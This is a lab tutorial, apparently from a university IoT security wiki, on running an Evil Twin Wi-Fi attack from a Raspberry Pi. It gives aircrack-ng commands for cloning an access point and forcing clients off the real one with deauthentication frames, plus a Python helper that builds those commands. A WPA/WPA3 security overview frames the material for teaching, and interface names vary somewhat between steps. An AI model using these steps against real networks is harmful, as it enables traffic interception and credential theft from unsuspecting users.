Evil Twin Attack on Raspberry Pi

From Embedded Lab Vienna for IoT & Security

Summary

This article describes how to carry out an Evil Twin attack from Kali Linux on a Raspberry Pi. The Evil Twin attack is a specific type of Man-in-the-Middle (MITM) attack that exploits the trust users place in Wi-Fi networks they have used before. The attacker creates a rogue access point (AP) that mimics the SSID (network name) and the MAC address (BSSID) of a legitimate AP. Devices that automatically reconnect to known networks may associate with the rogue AP without the user noticing. The attacker can then intercept, modify, and steal data transmitted by the victim, which can lead to credential theft, session hijacking, and the distribution of malware.

Evil Twin Attacks often occur in locations with public Wi-Fi networks, such as cafés, airports, hotels, shopping malls, and libraries. These locations have open or semi-open networks that make it easier for attackers to clone access points without raising suspicion.

A Raspberry Pi is well suited to such attacks because of its size and low price, especially when paired with the wireless tools included in Kali Linux. With airmon-ng, airodump-ng, airbase-ng, and aireplay-ng an attacker can scan for networks, create a rogue AP, and force clients to reconnect to it. This document provides a step-by-step guide to executing an Evil Twin attack and points out the WLAN security mechanisms that limit it.

Requirements

  • Operating system: Kali Linux ARM version
  • Packages: airmon-ng, airodump-ng, airbase-ng, aireplay-ng (all part of aircrack-ng), tcpdump, Wireshark
  • Hardware: Raspberry Pi 4 (Model B), 2x Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter, SD card, (Ethernet cable), Raspberry Pi power supply


In order to complete these steps, you must have followed Setting up Kali Linux on Raspberry Pi before.

WLAN Security

  • WEP (Wired Equivalent Privacy): Introduced in 1997, WEP encrypts with the RC4 stream cipher using a 24-bit initialization vector (IV). The small IV space forces IV reuse on a busy network, and weaknesses in RC4's key scheduling allow the key to be recovered from passively captured traffic, so WEP offers no real protection against an attacker who can sniff packets.
  • WPA (Wi-Fi Protected Access): Launched in 2003 as an interim replacement for WEP, WPA introduced the Temporal Key Integrity Protocol (TKIP), still RC4-based but with per-packet keys and a message integrity check, and the 4-way handshake for deriving session keys. In the pre-shared-key (PSK) mode the handshake messages are enough to test candidate passphrases offline, so weak passwords can be recovered by a dictionary attack against a single captured handshake.
  • WPA2: Released in 2004 (IEEE 802.11i), WPA2 replaced TKIP with CCMP (Counter Mode with CBC-MAC Protocol), an AES-based mode that provides confidentiality and integrity. WPA2-PSK inherits the offline dictionary weakness of WPA, and the 2017 KRACK attack showed that the 4-way handshake could be abused to reinstall already-used keys on the client.
  • WPA3: Introduced in 2018, WPA3 addresses these weaknesses. Simultaneous Authentication of Equals (SAE) replaces the PSK-based key derivation with a password-authenticated key exchange, so a captured handshake no longer allows offline password guessing, and it provides forward secrecy. WPA3 also mandates Protected Management Frames (IEEE 802.11w), which authenticate deauthentication frames; this defeats the deauthentication step of the attack described below.

Description

Step 1: The Environment

1. Download the Kali Linux ARM image for the Raspberry Pi and write it to the SD card: https://kali.download/arm-images/kali-2024.4/kali-linux-2024.4-raspberry-pi-armhf.img.xz

2. Insert the SD card into the Raspberry Pi and boot it. The default username and password are both "kali".

3. Connect to the Raspberry Pi headless via SSH or directly by using a monitor and keyboard.

4. Install the required packages (airmon-ng, airodump-ng, airbase-ng and aireplay-ng are all part of aircrack-ng):

 sudo apt-get update
 sudo apt-get install aircrack-ng wireshark tcpdump

The Alfa AWUS036ACH uses a Realtek RTL8812AU chipset that needs an out-of-tree driver; on Kali it is provided by the realtek-rtl88xxau-dkms package, which must be installed before the adapters are usable.

Step 2: Identifying the Target Network

1. Put the Wi-Fi adapter into monitor mode. On a Raspberry Pi 4 the on-board Wi-Fi is usually wlan0 and the two Alfa adapters appear as wlan1 and wlan2, so list the interfaces with airmon-ng (without arguments) first and substitute the correct name. If airmon-ng reports interfering processes (NetworkManager, wpa_supplicant), stop them with airmon-ng check kill; this drops the Pi's own Wi-Fi connection, which is why the Ethernet cable is recommended for the SSH session.

 airmon-ng start wlan0

2. Scan for nearby networks (add --band abg to include the 5 GHz channels the AC1200 adapters support; -w <prefix> --output-format csv additionally writes the results to a file):

 airodump-ng wlan0mon

3. Note the ESSID (SSID), BSSID (MAC address) and channel of the target network, and also its Privacy column: the rogue AP created in Step 3 is an open network, so the twin is only convincing for an open (OPN) target, and a WPA3 network ignores the deauthentication frames because management frame protection is mandatory there.

Step 3: Launch the Evil Twin Attack

1. Start the rogue access point on the first adapter. -e sets the SSID, -a clones the BSSID of the legitimate AP and -c puts the twin on the same channel. airbase-ng creates a tap interface named at0 through which all traffic of the connected clients passes:

 airbase-ng -e "<SSID>" -a <BSSID> -c <channel> wlan0mon

2. From the second adapter (this is why two adapters are listed in the requirements; tune it to the target channel, e.g. airmon-ng start wlan2 <channel>), send deauthentication frames so that clients drop off the legitimate AP and reconnect to the twin. -a is the BSSID of the legitimate AP and the number after --deauth is the count of deauth bursts (0 sends them continuously):

 aireplay-ng --deauth 10 -a <BSSID> wlan1mon

3. Capture the traffic passing through the rogue AP with tcpdump or Wireshark on the at0 interface. Clients only obtain connectivity if at0 is given an IP address, a DHCP server and forwarding to the Pi's Ethernet uplink; without this they associate with the twin but cannot reach the Internet, and only the association and DHCP attempts show up in the capture.
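The helper below is an added example (written for this article; it is not part of aircrack-ng or of the original page) that automates the hand-offs between Steps 2 and 3: it parses the CSV that airodump-ng writes with -w <prefix> --output-format csv, selects the target by SSID (the strongest BSSID if several carry the same name), checks the two preconditions that decide whether the attack can work (open target, no WPA3), and assembles the exact airbase-ng and aireplay-ng command lines. The sample CSV, the SSIDs and MAC addresses, and the interface names wlan1mon/wlan2mon are assumptions; the column layout is the one airodump-ng uses.

```python
"""Pick the Evil Twin target from an airodump-ng CSV and build the attack commands (added example)."""
import csv
import io
import shlex

# Constructed sample of an airodump-ng CSV: the access-point table, a blank line,
# then the station table (which this helper does not use).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2024-12-01 10:00:00, 2024-12-01 10:05:00,  6,  54, OPN, , , -45, 120, 0, 0. 0. 0. 0, 18, CoffeeShopFreeWiFi,
02:00:00:00:00:02, 2024-12-01 10:00:00, 2024-12-01 10:05:00, 36, 866, WPA2, CCMP, PSK, -60, 80, 0, 0. 0. 0. 0, 10, HomeOffice,
02:00:00:00:00:03, 2024-12-01 10:00:00, 2024-12-01 10:05:00, 11, 130, WPA3, CCMP, SAE, -70, 40, 0, 0. 0. 0. 0, 7, LabWPA3,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2024-12-01 10:01:00, 2024-12-01 10:05:00, -50, 30, 02:00:00:00:00:01, CoffeeShopFreeWiFi
"""


def parse_airodump_aps(text: str):
    """Return the access-point rows of an airodump-ng CSV as dicts keyed by the header names."""
    text = text.replace("\r\n", "\n").lstrip("\n")
    ap_section = text.split("\n\n", 1)[0]          # the AP table ends at the first blank line
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    rows = [[field.strip() for field in row] for row in reader if row]
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]


def select_target(aps, essid: str):
    """Pick the AP to clone; with several BSSIDs for one SSID take the one with the best signal."""
    matches = [ap for ap in aps if ap["ESSID"] == essid]
    if not matches:
        raise LookupError(f"no access point advertising ESSID {essid!r} in the scan")
    return max(matches, key=lambda ap: int(ap["Power"]))


def check_preconditions(ap):
    """List the reasons the airbase-ng / aireplay-ng steps would not work against this AP."""
    problems = []
    privacy = ap["Privacy"]
    if privacy != "OPN":
        problems.append(
            f"target is {privacy}: airbase-ng brings up an open twin, and clients that saved "
            f"this SSID as {privacy} will not auto-join an open network of the same name"
        )
    if privacy == "WPA3":
        problems.append("WPA3 mandates Protected Management Frames, so forged deauth frames are ignored")
    return problems


def build_commands(ap, ap_iface="wlan1mon", deauth_iface="wlan2mon", bursts=10):
    """Assemble Step 3.1 (rogue AP on one adapter) and Step 3.2 (deauth on the other).
    shlex.join quotes SSIDs that contain spaces or shell metacharacters."""
    essid, bssid, channel = ap["ESSID"], ap["BSSID"], ap["channel"]
    airbase = ["airbase-ng", "-e", essid, "-a", bssid, "-c", channel, ap_iface]
    deauth = ["aireplay-ng", "--deauth", str(bursts), "-a", bssid, deauth_iface]
    return {"airbase": shlex.join(airbase), "deauth": shlex.join(deauth)}


if __name__ == "__main__":
    target = select_target(parse_airodump_aps(SAMPLE_CSV), "CoffeeShopFreeWiFi")
    for problem in check_preconditions(target):
        print("warning:", problem)
    for cmd in build_commands(target).values():
        print(cmd)
```

Both adapters have to sit on the target's channel for the assembled commands to work (airmon-ng start <iface> <channel> does that), and the warnings from check_preconditions are the two cases in which the page's procedure silently fails: a WPA2 target, where clients do not auto-join the open twin, and a WPA3 target, where the deauthentication frames are discarded.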

Used Hardware

  • Raspberry Pi 4 (Model B)
  • Alfa AWUS036ACH Wide Range AC1200 Wireless Adapter

